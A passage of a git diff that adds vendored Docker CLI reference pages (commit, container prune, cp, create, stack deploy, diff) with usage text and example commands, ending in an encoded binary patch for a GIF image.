+Boolean options take the form `-d=false`. The value you see in the help text is
+the default value which is set if you do **not** specify that flag. If you
+specify a Boolean flag without a value, this will set the flag to `true`,
+irrespective of the default value.
+
+For example, running `docker run -d` will set the value to `true`, so your
+container **will** run in "detached" mode, in the background.
+
+Options which default to `true` (e.g., `docker build --rm=true`) can only be
+set to the non-default value by explicitly setting them to `false`:
+
+    $ docker build --rm=false .
+
+### Multi
+
+You can specify options like `-a=[]` multiple times in a single command line,
+for example in these commands:
+
+    $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash
+    $ docker run -a stdin -a stdout -a stderr ubuntu /bin/ls
+
+Sometimes, multiple options can call for a more complex value string as for
+`-v`:
+
+    $ docker run -v /host:/container example/mysql
+
+> **Note:**
+> Do not use the `-t` and `-a stderr` options together due to
+> limitations in the `pty` implementation. All `stderr` in `pty` mode
+> simply goes to `stdout`.
+
+### Strings and Integers
+
+Options like `--name=""` expect a string, and they
+can only be specified once. Options like `-c=0`
+expect an integer, and they can only be specified once.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md
new file mode 100644
index 0000000000..8f971a5d95
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md
@@ -0,0 +1,93 @@
+---
+title: "commit"
+description: "The commit command description and usage"
+keywords: "commit, file, changes"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# commit
+
+```markdown
+Usage:  docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]
+
+Create a new image from a container's changes
+
+Options:
+  -a, --author string    Author (e.g., "John Hannibal Smith <hannibal@a-team.com>")
+  -c, --change value     Apply Dockerfile instruction to the created image (default [])
+      --help             Print usage
+  -m, --message string   Commit message
+  -p, --pause            Pause container during commit (default true)
+```
+
+It can be useful to commit a container's file changes or settings into a new
+image. This allows you debug a container by running an interactive shell, or to
+export a working dataset to another server. Generally, it is better to use
+Dockerfiles to manage your images in a documented and maintainable way.
+[Read more about valid image names and tags](tag.md).
+
+The commit operation will not include any data contained in
+volumes mounted inside the container.
+
+By default, the container being committed and its processes will be paused
+while the image is committed. This reduces the likelihood of encountering data
+corruption during the process of creating the commit.  If this behavior is
+undesired, set the `--pause` option to false.
+
+The `--change` option will apply `Dockerfile` instructions to the image that is
+created.  Supported `Dockerfile` instructions:
+`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR`
+
+## Commit a container
+
+    $ docker ps
+    ID                  IMAGE               COMMAND             CREATED             STATUS              PORTS
+    c3f279d17e0a        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
+    197387f1b436        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
+    $ docker commit c3f279d17e0a  svendowideit/testimage:version3
+    f5283438590d
+    $ docker images
+    REPOSITORY                        TAG                 ID                  CREATED             SIZE
+    svendowideit/testimage            version3            f5283438590d        16 seconds ago      335.7 MB
+
+## Commit a container with new configurations
+
+    {% raw %}
+    $ docker ps
+    ID                  IMAGE               COMMAND             CREATED             STATUS              PORTS
+    c3f279d17e0a        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
+    197387f1b436        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
+    $ docker inspect -f "{{ .Config.Env }}" c3f279d17e0a
+    [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin]
+    $ docker commit --change "ENV DEBUG true" c3f279d17e0a  svendowideit/testimage:version3
+    f5283438590d
+    $ docker inspect -f "{{ .Config.Env }}" f5283438590d
+    [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin DEBUG=true]
+    {% endraw %}
+
+## Commit a container with new `CMD` and `EXPOSE` instructions
+
+    $ docker ps
+    ID                  IMAGE               COMMAND             CREATED             STATUS              PORTS
+    c3f279d17e0a        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
+    197387f1b436        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
+
+    $ docker commit --change='CMD ["apachectl", "-DFOREGROUND"]' -c "EXPOSE 80" c3f279d17e0a  svendowideit/testimage:version4
+    f5283438590d
+
+    $ docker run -d svendowideit/testimage:version4
+    89373736e2e7f00bc149bd783073ac43d0507da250e999f3f1036e0db60817c0
+
+    $ docker ps
+    ID                  IMAGE               COMMAND                 CREATED             STATUS              PORTS
+    89373736e2e7        testimage:version4  "apachectl -DFOREGROU"  3 seconds ago       Up 2 seconds        80/tcp
+    c3f279d17e0a        ubuntu:12.04        /bin/bash               7 days ago          Up 25 hours
+    197387f1b436        ubuntu:12.04        /bin/bash               7 days ago          Up 25 hours
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md
new file mode 100644
index 0000000000..43156406ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md
@@ -0,0 +1,47 @@
+---
+title: "container prune"
+description: "Remove all stopped containers"
+keywords: container, prune, delete, remove
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# container prune
+
+```markdown
+Usage:	docker container prune [OPTIONS]
+
+Remove all stopped containers
+
+Options:
+  -f, --force   Do not prompt for confirmation
+      --help    Print usage
+```
+
+## Examples
+
+```bash
+$ docker container prune
+WARNING! This will remove all stopped containers.
+Are you sure you want to continue? [y/N] y
+Deleted Containers:
+4a7f7eebae0f63178aff7eb0aa39cd3f0627a203ab2df258c1a00b456cf20063
+f98f9c2aa1eaf727e4ec9c0283bc7d4aa4762fbdba7f26191f26c97f64090360
+
+Total reclaimed space: 212 B
+```
+
+## Related information
+
+* [system df](system_df.md)
+* [volume prune](volume_prune.md)
+* [image prune](image_prune.md)
+* [network prune](network_prune.md)
+* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md
new file mode 100644
index 0000000000..fcfd35fce1
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md
@@ -0,0 +1,112 @@
+---
+title: "cp"
+description: "The cp command description and usage"
+keywords: "copy, container, files, folders"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# cp
+
+```markdown
+Usage:  docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|-
+        docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH
+
+Copy files/folders between a container and the local filesystem
+
+Use '-' as the source to read a tar archive from stdin
+and extract it to a directory destination in a container.
+Use '-' as the destination to stream a tar archive of a
+container source to stdout.
+
+Options:
+  -L, --follow-link   Always follow symbol link in SRC_PATH
+      --help          Print usage
+```
+
+The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`.
+You can copy from the container's file system to the local machine or the
+reverse, from the local filesystem to the container. If `-` is specified for
+either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from
+`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container.
+The `SRC_PATH` or `DEST_PATH` can be a file or directory.
+
+The `docker cp` command assumes container paths are relative to the container's
+`/` (root) directory. This means supplying the initial forward slash is optional;
+The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and
+`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can
+be an absolute or relative value. The command interprets a local machine's
+relative paths as relative to the current working directory where `docker cp` is
+run.
+
+The `cp` command behaves like the Unix `cp -a` command in that directories are
+copied recursively with permissions preserved if possible. Ownership is set to
+the user and primary group at the destination. For example, files copied to a
+container are created with `UID:GID` of the root user. Files copied to the local
+machine are created with the `UID:GID` of the user which invoked the `docker cp`
+command.  If you specify the `-L` option, `docker cp` follows any symbolic link
+in the `SRC_PATH`.  `docker cp` does *not* create parent directories for
+`DEST_PATH` if they do not exist.
+
+Assuming a path separator of `/`, a first argument of `SRC_PATH` and second
+argument of `DEST_PATH`, the behavior is as follows:
+
+- `SRC_PATH` specifies a file
+    - `DEST_PATH` does not exist
+        - the file is saved to a file created at `DEST_PATH`
+    - `DEST_PATH` does not exist and ends with `/`
+        - Error condition: the destination directory must exist.
+    - `DEST_PATH` exists and is a file
+        - the destination is overwritten with the source file's contents
+    - `DEST_PATH` exists and is a directory
+        - the file is copied into this directory using the basename from
+          `SRC_PATH`
+- `SRC_PATH` specifies a directory
+    - `DEST_PATH` does not exist
+        - `DEST_PATH` is created as a directory and the *contents* of the source
+           directory are copied into this directory
+    - `DEST_PATH` exists and is a file
+        - Error condition: cannot copy a directory to a file
+    - `DEST_PATH` exists and is a directory
+        - `SRC_PATH` does not end with `/.`
+            - the source directory is copied into this directory
+        - `SRC_PATH` does end with `/.`
+            - the *content* of the source directory is copied into this
+              directory
+
+The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above
+rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not
+the target, is copied by default. To copy the link target and not the link, specify
+the `-L` option.
+
+A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can
+also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local
+machine, for example  `file:name.txt`. If you use a `:` in a local machine path,
+you must be explicit with a relative or absolute path, for example:
+
+    `/path/to/file:name.txt` or `./file:name.txt`
+
+It is not possible to copy certain system files such as resources under
+`/proc`, `/sys`, `/dev`, [tmpfs](run.md#mount-tmpfs-tmpfs), and mounts created by
+the user in the container. However, you can still copy such files by manually
+running `tar` in `docker exec`. For example (consider `SRC_PATH` and `DEST_PATH`
+are directories):
+
+    $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH -
+
+or
+
+    $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH -
+
+
+Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive.
+The command extracts the content of the tar to the `DEST_PATH` in container's
+filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as
+the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/create.md b/vendor/github.com/docker/docker/docs/reference/commandline/create.md
new file mode 100644
index 0000000000..e6582e4a38
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/create.md
@@ -0,0 +1,211 @@
+---
+title: "create"
+description: "The create command description and usage"
+keywords: "docker, create, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# create
+
+Creates a new container.
+
+```markdown
+Usage:  docker create [OPTIONS] IMAGE [COMMAND] [ARG...]
+
+Create a new container
+
+Options:
+      --add-host value              Add a custom host-to-IP mapping (host:ip) (default [])
+  -a, --attach value                Attach to STDIN, STDOUT or STDERR (default [])
+      --blkio-weight value          Block IO (relative weight), between 10 and 1000
+      --blkio-weight-device value   Block IO weight (relative device weight) (default [])
+      --cap-add value               Add Linux capabilities (default [])
+      --cap-drop value              Drop Linux capabilities (default [])
+      --cgroup-parent string        Optional parent cgroup for the container
+      --cidfile string              Write the container ID to the file
+      --cpu-count int               The number of CPUs available for execution by the container.
+                                    Windows daemon only. On Windows Server containers, this is
+                                    approximated as a percentage of total CPU usage.
+      --cpu-percent int             CPU percent (Windows only)
+      --cpu-period int              Limit CPU CFS (Completely Fair Scheduler) period
+      --cpu-quota int               Limit CPU CFS (Completely Fair Scheduler) quota
+  -c, --cpu-shares int              CPU shares (relative weight)
+      --cpus NanoCPUs               Number of CPUs (default 0.000)
+      --cpu-rt-period int           Limit the CPU real-time period in microseconds
+      --cpu-rt-runtime int          Limit the CPU real-time runtime in microseconds
+      --cpuset-cpus string          CPUs in which to allow execution (0-3, 0,1)
+      --cpuset-mems string          MEMs in which to allow execution (0-3, 0,1)
+      --device value                Add a host device to the container (default [])
+      --device-read-bps value       Limit read rate (bytes per second) from a device (default [])
+      --device-read-iops value      Limit read rate (IO per second) from a device (default [])
+      --device-write-bps value      Limit write rate (bytes per second) to a device (default [])
+      --device-write-iops value     Limit write rate (IO per second) to a device (default [])
+      --disable-content-trust       Skip image verification (default true)
+      --dns value                   Set custom DNS servers (default [])
+      --dns-option value            Set DNS options (default [])
+      --dns-search value            Set custom DNS search domains (default [])
+      --entrypoint string           Overwrite the default ENTRYPOINT of the image
+  -e, --env value                   Set environment variables (default [])
+      --env-file value              Read in a file of environment variables (default [])
+      --expose value                Expose a port or a range of ports (default [])
+      --group-add value             Add additional groups to join (default [])
+      --health-cmd string           Command to run to check health
+      --health-interval duration    Time between running the check (ns|us|ms|s|m|h) (default 0s)
+      --health-retries int          Consecutive failures needed to report unhealthy
+      --health-timeout duration     Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)
+      --help                        Print usage
+  -h, --hostname string             Container host name
+      --init                        Run an init inside the container that forwards signals and reaps processes
+      --init-path string            Path to the docker-init binary
+  -i, --interactive                 Keep STDIN open even if not attached
+      --io-maxbandwidth string      Maximum IO bandwidth limit for the system drive (Windows only)
+      --io-maxiops uint             Maximum IOps limit for the system drive (Windows only)
+      --ip string                   Container IPv4 address (e.g. 172.30.100.104)
+      --ip6 string                  Container IPv6 address (e.g. 2001:db8::33)
+      --ipc string                  IPC namespace to use
+      --isolation string            Container isolation technology
+      --kernel-memory string        Kernel memory limit
+  -l, --label value                 Set meta data on a container (default [])
+      --label-file value            Read in a line delimited file of labels (default [])
+      --link value                  Add link to another container (default [])
+      --link-local-ip value         Container IPv4/IPv6 link-local addresses (default [])
+      --log-driver string           Logging driver for the container
+      --log-opt value               Log driver options (default [])
+      --mac-address string          Container MAC address (e.g. 92:d0:c6:0a:29:33)
+  -m, --memory string               Memory limit
+      --memory-reservation string   Memory soft limit
+      --memory-swap string          Swap limit equal to memory plus swap: '-1' to enable unlimited swap
+      --memory-swappiness int       Tune container memory swappiness (0 to 100) (default -1)
+      --name string                 Assign a name to the container
+      --network-alias value         Add network-scoped alias for the container (default [])
+      --network string              Connect a container to a network (default "default")
+                                    'bridge': create a network stack on the default Docker bridge
+                                    'none': no networking
+                                    'container:<name|id>': reuse another container's network stack
+                                    'host': use the Docker host network stack
+                                    '<network-name>|<network-id>': connect to a user-defined network
+      --no-healthcheck              Disable any container-specified HEALTHCHECK
+      --oom-kill-disable            Disable OOM Killer
+      --oom-score-adj int           Tune host's OOM preferences (-1000 to 1000)
+      --pid string                  PID namespace to use
+      --pids-limit int              Tune container pids limit (set -1 for unlimited), kernel >= 4.3
+      --privileged                  Give extended privileges to this container
+  -p, --publish value               Publish a container's port(s) to the host (default [])
+  -P, --publish-all                 Publish all exposed ports to random ports
+      --read-only                   Mount the container's root filesystem as read only
+      --restart string              Restart policy to apply when a container exits (default "no")
+                                    Possible values are: no, on-failure[:max-retry], always, unless-stopped
+      --rm                          Automatically remove the container when it exits
+      --runtime string              Runtime to use for this container
+      --security-opt value          Security Options (default [])
+      --shm-size string             Size of /dev/shm, default value is 64MB.
+                                    The format is `<number><unit>`. `number` must be greater than `0`.
+                                    Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes),
+                                    or `g` (gigabytes). If you omit the unit, the system uses bytes.
+      --stop-signal string          Signal to stop a container, SIGTERM by default (default "SIGTERM")
+      --stop-timeout=10             Timeout (in seconds) to stop a container
+      --storage-opt value           Storage driver options for the container (default [])
+      --sysctl value                Sysctl options (default map[])
+      --tmpfs value                 Mount a tmpfs directory (default [])
+  -t, --tty                         Allocate a pseudo-TTY
+      --ulimit value                Ulimit options (default [])
+  -u, --user string                 Username or UID (format: <name|uid>[:<group|gid>])
+      --userns string               User namespace to use
+                                    'host': Use the Docker host user namespace
+                                    '': Use the Docker daemon user namespace specified by `--userns-remap` option.
+      --uts string                  UTS namespace to use
+  -v, --volume value                Bind mount a volume (default []). The format
+                                    is `[host-src:]container-dest[:<options>]`.
+                                    The comma-delimited `options` are [rw|ro],
+                                    [z|Z], [[r]shared|[r]slave|[r]private], and
+                                    [nocopy]. The 'host-src' is an absolute path
+                                    or a name value.
+      --volume-driver string        Optional volume driver for the container
+      --volumes-from value          Mount volumes from the specified container(s) (default [])
+  -w, --workdir string              Working directory inside the container
+```
+
+The `docker create` command creates a writeable container layer over the
+specified image and prepares it for running the specified command.  The
+container ID is then printed to `STDOUT`.  This is similar to `docker run -d`
+except the container is never started.  You can then use the
+`docker start <container_id>` command to start the container at any point.
+
+This is useful when you want to set up a container configuration ahead of time
+so that it is ready to start when you need it. The initial status of the
+new container is `created`.
+
+Please see the [run command](run.md) section and the [Docker run reference](../run.md) for more details.
+
+## Examples
+
+    $ docker create -t -i fedora bash
+    6d8af538ec541dd581ebc2a24153a28329acb5268abe5ef868c1f1a261221752
+    $ docker start -a -i 6d8af538ec5
+    bash-4.2#
+
+As of v1.4.0 container volumes are initialized during the `docker create` phase
+(i.e., `docker run` too). For example, this allows you to `create` the `data`
+volume container, and then use it from another container:
+
+    $ docker create -v /data --name data ubuntu
+    240633dfbb98128fa77473d3d9018f6123b99c454b3251427ae190a7d951ad57
+    $ docker run --rm --volumes-from data ubuntu ls -la /data
+    total 8
+    drwxr-xr-x  2 root root 4096 Dec  5 04:10 .
+    drwxr-xr-x 48 root root 4096 Dec  5 04:11 ..
+
+Similarly, `create` a host directory bind mounted volume container, which can
+then be used from the subsequent container:
+
+    $ docker create -v /home/docker:/docker --name docker ubuntu
+    9aa88c08f319cd1e4515c3c46b0de7cc9aa75e878357b1e96f91e2c773029f03
+    $ docker run --rm --volumes-from docker ubuntu ls -la /docker
+    total 20
+    drwxr-sr-x  5 1000 staff  180 Dec  5 04:00 .
+    drwxr-xr-x 48 root root  4096 Dec  5 04:13 ..
+    -rw-rw-r--  1 1000 staff 3833 Dec  5 04:01 .ash_history
+    -rw-r--r--  1 1000 staff  446 Nov 28 11:51 .ashrc
+    -rw-r--r--  1 1000 staff   25 Dec  5 04:00 .gitconfig
+    drwxr-sr-x  3 1000 staff   60 Dec  1 03:28 .local
+    -rw-r--r--  1 1000 staff  920 Nov 28 11:51 .profile
+    drwx--S---  2 1000 staff  460 Dec  5 00:51 .ssh
+    drwxr-xr-x 32 1000 staff 1140 Dec  5 04:01 docker
+
+Set storage driver options per container.
+
+    $ docker create -it --storage-opt size=120G fedora /bin/bash
+
+This (size) will allow to set the container rootfs size to 120G at creation time.
+This option is only available for the `devicemapper`, `btrfs`, `overlay2`,
+`windowsfilter` and `zfs` graph drivers.
+For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers,
+user cannot pass a size less than the Default BaseFS Size.
+For the `overlay2` storage driver, the size option is only available if the
+backing fs is `xfs` and mounted with the `pquota` mount option.
+Under these conditions, user can pass any size less then the backing fs size.
+
+### Specify isolation technology for container (--isolation)
+
+This option is useful in situations where you are running Docker containers on
+Windows. The `--isolation=<value>` option sets a container's isolation
+technology. On Linux, the only supported is the `default` option which uses
+Linux namespaces. On Microsoft Windows, you can specify these values:
+
+
+| Value     | Description                                                                                                                                                   |
+|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value if the
+daemon is running on Windows server, or `hyperv` if running on Windows client.  |
+| `process` | Namespace isolation only.                                                                                                                                     |
+| `hyperv`   | Hyper-V hypervisor partition-based isolation.                                                                                                                  |
+
+Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md
new file mode 100644
index 0000000000..53074b2fd4
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md
@@ -0,0 +1,101 @@
+---
+title: "deploy"
+description: "The deploy command description and usage"
+keywords: "stack, deploy"
+advisory: "experimental"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# deploy (alias for stack deploy) (experimental)
+
+```markdown
+Usage:  docker deploy [OPTIONS] STACK
+
+Deploy a new stack or update an existing stack
+
+Aliases:
+  deploy, up
+
+Options:
+      --bundle-file string    Path to a Distributed Application Bundle file
+      --compose-file string   Path to a Compose file
+      --help                  Print usage
+      --with-registry-auth    Send registry authentication details to Swarm agents
+```
+
+Create and update a stack from a `compose` or a `dab` file on the swarm. This command
+has to be run targeting a manager node.
+
+## Compose file
+
+The `deploy` command supports compose file version `3.0` and above.
+
+```bash
+$ docker stack deploy --compose-file docker-compose.yml vossibility
+Ignoring unsupported options: links
+
+Creating network vossibility_vossibility
+Creating network vossibility_default
+Creating service vossibility_nsqd
+Creating service vossibility_logstash
+Creating service vossibility_elasticsearch
+Creating service vossibility_kibana
+Creating service vossibility_ghollector
+Creating service vossibility_lookupd
+```
+
+You can verify that the services were correctly created
+
+```
+$ docker service ls
+ID            NAME                               MODE        REPLICAS  IMAGE
+29bv0vnlm903  vossibility_lookupd                replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4awt47624qwh  vossibility_nsqd                   replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4tjx9biia6fs  vossibility_elasticsearch          replicated  1/1       elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
+7563uuzr9eys  vossibility_kibana                 replicated  1/1       kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
+9gc5m4met4he  vossibility_logstash               replicated  1/1       logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
+axqh55ipl40h  vossibility_vossibility-collector  replicated  1/1       icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
+```
+
+## DAB file
+
+```bash
+$ docker stack deploy --bundle-file vossibility-stack.dab vossibility
+Loading bundle from vossibility-stack.dab
+Creating service vossibility_elasticsearch
+Creating service vossibility_kibana
+Creating service vossibility_logstash
+Creating service vossibility_lookupd
+Creating service vossibility_nsqd
+Creating service vossibility_vossibility-collector
+```
+
+You can verify that the services were correctly created:
+
+```bash
+$ docker service ls
+ID            NAME                               MODE        REPLICAS  IMAGE
+29bv0vnlm903  vossibility_lookupd                replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4awt47624qwh  vossibility_nsqd                   replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4tjx9biia6fs  vossibility_elasticsearch          replicated  1/1       elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
+7563uuzr9eys  vossibility_kibana                 replicated  1/1       kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
+9gc5m4met4he  vossibility_logstash               replicated  1/1       logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
+axqh55ipl40h  vossibility_vossibility-collector  replicated  1/1       icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
+```
+
+## Related information
+
+* [stack config](stack_config.md)
+* [stack deploy](stack_deploy.md)
+* [stack ls](stack_ls.md)
+* [stack ps](stack_ps.md)
+* [stack rm](stack_rm.md)
+* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md
new file mode 100644
index 0000000000..be27678dcd
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md
@@ -0,0 +1,48 @@
+---
+title: "diff"
+description: "The diff command description and usage"
+keywords: "list, changed, files, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# diff
+
+```markdown
+Usage:  docker diff CONTAINER
+
+Inspect changes on a container's filesystem
+
+Options:
+      --help   Print usage
+```
+
+List the changed files and directories in a container᾿s filesystem.
+ There are 3 events that are listed in the `diff`:
+
+1. `A` - Add
+2. `D` - Delete
+3. `C` - Change
+
+For example:
+
+    $ docker diff 7bb0e258aefe
+
+    C /dev
+    A /dev/kmsg
+    C /etc
+    A /etc/mtab
+    A /go
+    A /go/src
+    A /go/src/github.com
+    A /go/src/github.com/docker
+    A /go/src/github.com/docker/docker
+    A /go/src/github.com/docker/docker/.git
+    ....
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif b/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif
new file mode 100644
index 0000000000000000000000000000000000000000..5894ca270e002758b8f332141e00356e42868880
GIT binary patch
literal 35785
zcmd3tS6CBW*sj+UAPFD|HS{DP9Sl`K#LzngL_|~wh=>J0Kv6{0(5o7H5is<s1Qeu*
zh9=Dt6ciCZ19of?ELhom|9@TkY@hGvV2)>Itu^ai_j`|%i=(+kus7_0yaNA47>mV;
zii%50N=ZvgDgGCEGFeScO+{N<S67#;ufN{tzi646Z8SI6-Sl5J&}ds|G()@p;^gdX
z=IZL^=4RpHVddlF>+4I~zJ0sDe?UNh-Oink491>4dt5?8J@)TEc<>-SB4TS))R7}c
z0#5#yKqfOd`M>PV%*@Kl3O{@HU~X<+Ufw^&#nBi3%dyJJnwpvuwY8_3nwp!NnU^mo
zUHLC*U0uDsy_wgqpX=`*930FU9?l;hpO}~^zIX4!ga2}IX6DJ0Csj|M*3QpAfByX4
zyLXpAd{|yy{`>du|2*{nFBkF;6bpbi(EIO({u>h@vdW|<CMBn&rln_OW@Vo}cb=7#
zo0nfuSX5k6dZDbm;v&1Us=B7OuD+qMsk!CS<yKBx`<1I5o!7d$dwQ?;-MGo^9~c}O
zzBMvBHa>Ct&fR;w$@>qcrXN0<c|7}M?&-hJ`11?TU%Y(v`pw(Lcke%Z{3Q6iwEX4k
zx9=-Ie*XIX=kF>&a7xY`c7GB^N@v$7r*be2ujX3j+*UQ5MKnGzH`-P`a-L+DspQgL
zGnS{dwQ1K_d+kIKb<cR2%ayu27tD_=&W&BEzju+Agj06C+Avw|oTsyU{A%NadU~~M
zxobz$bhH1J15d|0njf_?1~Zl2I$IuJ34hSEd!qBwlWUQy&&SK%u3diG8@s&tbmCg;
zvztsrRK>lEGe4Lvr5kv=tL^y+OU<pqy}SM8M6vO~e{XkRd3}#<m!;y-bM@_mhONzk
zcX~SBJ>u+{sPO3R{P3jf$h&{<^j`b)jGH8?>Uq8E^YhU>-JrYIyO&?{s@*Pn_VvWv
z_lWH>Csg%*|HL26QuVrV{m1f~v5S%Y)nhTK7CHdXxe$t5S$_BI-p!k<t3X(b&-`P<
zr$NixSc4};J~IK3yUk9PlJ*OqPa%di%%>_Hdo!P=s$)1P1V~&Y2{vtmfPxsbkVU<v
z^*md7T_pq*trDuXIFaaJor$pa3zmIAx*dd3YJ0wFZI9;zNe4&mm-$MRc>vk#Wq3)V
zblS@z#%UJ_atYsYPfC=^u`fQ<DgQ!JOpje%vXo3^5)Qv=)J%62!^7pDQHU#cQuaW2
zsxiQ$>`zwwmz6AA*M20sQ|*mJPFTPjiA=v9PmEZ&PE&>0@3;FcQ8sU0l3ENxQ{Cq1
zaEfgMXRxW=ufe|AwB>E3q;9&P>GJiT0rTrL*vz-B!w1X<aT_DkVW_?;4+Rqk%!eRz
zJwrR_THs0q<T+y=p7z`aV-FWsu|S2AP83rZ5AaPr?=9yIu6w4FKq6=upYQo_<K(<J
zmdhvC@Acd1xegq4?iZ0c4Qy6Z6<F`k`s8E9hAE=AUCD^#(V2ndpD_OLs7$VVu(%q%
zVGw|>F7kw0(XM$6gn=kP)Y5&OIDE7?Z1{U%Lq8-P{eJ$w=le*56bfS^m>{D7G4J^t
zpKF~q-0t7;h<HrDbJ}wba78!ZXi2;mLo`~N79b@_xry;RBsUb(kts!q@oTu>mi^bB
z(Fds=Qkkvv%5_?0W%J_abw0*CPgTTnId)vCt+;eRAo-Q!Z&5YKkh}TZoH8W}05v+W
zOtGW#lB6~O?oqyi9?b^8dOLr8=r%47pYa~_oEI?$IsL$Tr}-cxP&w1GBzJ?vY}MU$
z$R5%+58k|*;xp1>j>^k164M%*4c5I=9zVDtUoGpsJ=A-|HH!b;h_U6bCvO(kNk%~O
